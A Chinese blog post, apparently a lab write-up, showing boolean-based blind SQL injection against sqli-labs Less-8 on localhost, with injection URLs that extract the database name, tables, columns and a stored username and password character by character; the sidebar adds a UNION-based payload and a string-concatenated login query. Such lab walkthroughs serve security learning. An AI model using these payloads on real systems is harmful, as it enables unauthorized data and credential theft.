安科网

布尔盲注(基于sqli-labs第八关)

Enjoyendless

Enjoyendless

2020-04-14

关注 关注

布尔盲注(基于sqli-labs第八关)

对于盲注只有2种感觉,好玩,好烦。

新技能好玩,一个一个猜好烦。不知道你们是否跟我一样。

手工注入,一个个猜解。大多数人都会觉得特别烦躁的东西。

注入还设有第一点,看注入点在哪里。

个人的查看注入点的方式‘单引号,“双引号,

http://localhost/sqli/Less-8/?id=1 #正常

http://localhost/sqli/Less-8/?id=1 #不正常

http://localhost/sqli/Less-8/?id=1" #正常

接下来就是构造闭合

http://localhost/sqli/Less-8/?id=1‘--+ #正常,我可以认为是闭合成功了。

http://localhost/sqli/Less-8/?id=1‘ and 1=1--+ #正常

http://localhost/sqli/Less-8/?id=1‘ and 1=2--+ #不正常

接下来我可以尝试猜解数据库了。首先猜解数据库的长度。数据库猜解长度的函数length

length() 返回字符串的长度

http://localhost/sqli/Less-8/?id=1‘ and length(database())>1--+ #肯定大于1,这个事实

http://localhost/sqli/Less-8/?id=1‘ and length(database())>7--+ #大于7

http://localhost/sqli/Less-8/?id=1‘ and length(database())>8--+ #不大于8

http://localhost/sqli/Less-8/?id=1‘ and length(database())=8--+ #数据库等于8,然后呢!

然后猜解字符了,编辑坑爹呀!感觉还是写个字典用burp跑

通过ascii()和substr()猜测数据库名

ascii() #返回指定数字对应的ascii码字符函数

substr() #截取从pos位置开始到最后的所有str字符串

布尔盲注(基于sqli-labs第八关)

http://localhost/sqli/Less-8/?id=1‘ and (select ascii(substr(database(),1,1)))=115--+ #115=s

布尔盲注(基于sqli-labs第八关)

不停的爆破

第二个是101 e

第三个是 99 c

第四个是117 u

第五个是114 r

第六个是105 i

第七个是116 t

第八个是121 y

可以得到数据库名字为:security

接下来头疼的爆数据表,盲注果然是很枯燥的事情。

http://localhost/sqli/Less-8/?id=1‘ and (select ascii(substr((select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),1,1)))=117--+

第一个数据表 101,109,97,105,108,115 =>emails

第二个数据表 114,101,102,101,114,101,114,115 =>referers

第三个数据表 117,97,103,101,110,116,115 =>uagents

第四个数据表 117,115,101,114,115 =>users

爆字段了,我是有点奔溃了。。。。接下来更加坑爹的爆字段。

http://localhost/sqli/Less-8/?id=1‘ and (select ascii(substr((select column_name from information_schema.columns where table_name=‘users‘ limit 0,1),2,1)))=105--+

第一个字段 117,115,101,114,95,105,100 =>user_id

第二个字段 102,105,114,115,116,95,110,97,109,101 =>first_name

内心是奔溃,想办法简略一下。不是117=u或者112=p直接忽略

第三个字段 108 pass =>last_name

第四个字段 117,115,101,114 =>user

第五个字段 112,97,115,115,119,111,114,100, =>password

第六个字段 97 pass =>avatar

第七个字段 105 =》id

第八个字段 117,115,101,114,110,97,109,101 =>username

猜解一下用户名username,密码password

感觉太悲催。

http://localhost/sqli/Less-8/?id=1‘ and (select ascii(substr((select username from users limit 0,1),1,1)))=105--+

第一个用户名:68,117,109,98 =>Dumb

http://localhost/sqli/Less-8/?id=1‘ and (select ascii(substr((select password from users limit 0,1),1,1)))=68--+

第一个密码:68,117,109,98 =>Dumb

 

localhost less

Enjoyendless

Enjoyendless

0 关注 0 粉丝 0 动态

关注 关注

相关推荐

sqli-labs-master 第二关+第三关+第四关

id=0") UNION SELECT 1,username, password from users limit 5,1 %23

sixyearsorless 2020-05-07

nginx 多个location转发任意请求或访问静态资源文件的实现

本文主要介绍了nginx 多个location转发任意请求或访问静态资源文件的实现,分享给大家,具体如下:。#去掉了只有url才转发的限制,因为直接访问域名会通不过if从而转发不了请求。没有特殊需求就不要判断直接proxy_pass到请求

liwf 2020-11-10

ASP.NET Core3.1 Ocelot路由的实现

前一个章节我们已经介绍过Ocelot,相信大家也了解到,Ocelot的主要功能是接收客户端等传入的HTTP请求,并将其转发到下游服务。Ocelot当前仅以另一个http请求的形式支持此功能。Ocelot将一个请求路由到另一个请求。为了让Ocelot正常工作

sjun0 2020-11-12

ElasticSearch最全详细使用教程

本文介绍了ElasticSearch的必备知识:从入门、索引管理到映射详解。Green - everything is good ,即最佳状态。Yellow - all data is available but some replicas are not

做对一件事很重要 2020-09-07

win10下用ssh做端口转发时因为localhost解析引起的失败

这个命令在win7下面跑没有问题,但是win10下面跑,就总是不能成功。加上-v -v -v参数查看ssh的输出日志,发现存在read failed, write failed等日志。后面通过网络搜索得到提示,是不是localhost的解析不对。执行 pi

BraveWangDev 2020-08-19

如何通过Apache在本地配置多个虚拟主机

如何使用 Apache 在本地配置出多个虚拟主机呢?而且使用不同的“域名”来访问本地不同的站点呢?1,根目录中有一个 phpMyAdmin/ 的文件夹,它是一个网页版的数据库管理系统(肯定不会陌生的吧!),我想通过访问一个简单的:. 来进入这个系统;这样,

songshijiazuaa 2020-08-15

Nginx/Httpd反代tomcat配置

  常见的的反代服务器有haproxy、nginx、httpd,这三款软件中haproxy和nginx 可基于http协议来代理tomcat;httpd可基于http协议反代tomcat,也支持ajp协议反代tomcat,如果是ajp协议反代tomcat,

FanErZong 2020-07-18

oracle无法通过ip地址连接

问题描述:使用plsql可以连接本地oracle实例,但telnet 192.168.130.71 不通。其实在11g安装完成后,默认网络配置 listener.ora中 host = localhost,该文件位于d:\app\long.yue\prod

大慧 2020-07-04

elasticsearch常用命令

获取es的基本信息。查看当前节点的所有 Index

tigercn 2020-06-25

Docker数据管理与挂载管理

介绍如何在 Docker 内部以及容器之间管理数据;在容器中管理数据主要有两种方式:数据卷、挂载主机目录 . [ ~]# mkdir -p /data/nginx_test2 # 在宿主机创建目录,要挂载的目录。bin boot data_volum

houjinkai 2020-06-18

Linux -Centos7 Mysql开启远程连接

默认是不能用客户端远程连接的,阿里云提供的help.docx里面做了设置说明,mysql密码默认存放。update user set host=‘%‘ where user=‘root‘ and host=‘localhost‘;备注:您也可以添加一个用户

LUOPING0 2020-06-16

屡试屡爽的linux无图形化安装oracle操作流程

首先安装好centos6.8 mini版本,使用SSH工具正常登陆,gcc gcc-c++ make binutilscompat-libstdc++-33elfutils-libelf elfutils-libelf-devel glibc glibc-

Carlos 2020-06-16

tomcat 配置静态资源访问

或者在webapps文件夹下。将文件file.txt放在webapps文件夹下。红色框中的两个文件夹都可放置静态资源 访问路径都已localhost:8080/+你文件的名称

85427617 2020-06-13

解决只能通过localhost访问Elasticsearch的问题

好啦,如果你的Elasticsearch其他配置都ok的话,你就可以启动浏览器,输入你的ip+9200,正常地通过外网进行访问了

心丨悦 2020-06-13

kafka 常用命令总结

bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic web_douyin_author --from-beginning. bin/kafka-topics.sh

guicaizhou 2020-06-12

Tomcat中更改网站根目录和默认页的配置方法

如果你想让tomcat自动找到自己的页面,比如main.jsp。可以修改上面信息为:

87497118 2020-06-09

java连接本地oracle数据库连接不上

java连接本地数据库一直连接不上,tomcat启动一直卡在某个地方,也不报错,因为系统以前出现过debug启动卡在摸个地方的请款,是重新打包解决,这次也重新打包,可是并没有解决这次的问题,跟以前连接远程的时候的配置做了对比觉得应该不会错。多番测试终于找到

wenjieyatou 2020-06-08

php表单提交时获取不到post数据的解决方法

确定问题:观察你的运行php的浏览器地址,会发现在PhpStorm中打开浏览器使用的服务端口号是63342. 既然PhpStorm内部服务器有问题,那解决方法就是想办法不使用内部服务器。然后把项目建在Apache目录下的htdocs里面就可以了。

stoneechogx 2020-06-04

mysql连接方式二

此项设置允许 tcp/ip 访问,但是只有127.0.0.1 有可以访问,如果把skip-networking 开启。则只能通过sock连接。这两个命令在skip-networking 开启的时候localhost能正常登录mysql,但是127.0.0.

minggehenhao 2020-06-02

C#连接mysql数据库实现登陆注册界面

mysql> alter table user modify id int auto_increment;String sql = "select user,pass from user where user=‘" + usern

msmysql 2020-06-02
Enjoyendless

Enjoyendless

W3CSchool教程
HTML 教程
CSS 教程
Bootstrap 教程
Javascript 教程
jQuery 教程
后端教程
C 教程
Java 教程
PHP 教程
Python 教程
Go 教程
移动开发
Android 教程
Swift 教程
Kotlin 教程
jQuery Mobile 教程
ionic 教程
关于我们
新闻动态
联系方式
招聘英才
安科实验室
帮助与反馈

安科网(Ancii),中国第一极客网

Copyright © 2013 - 2019 Ancii.com

京ICP备18063983号 京公网安备11010802014868号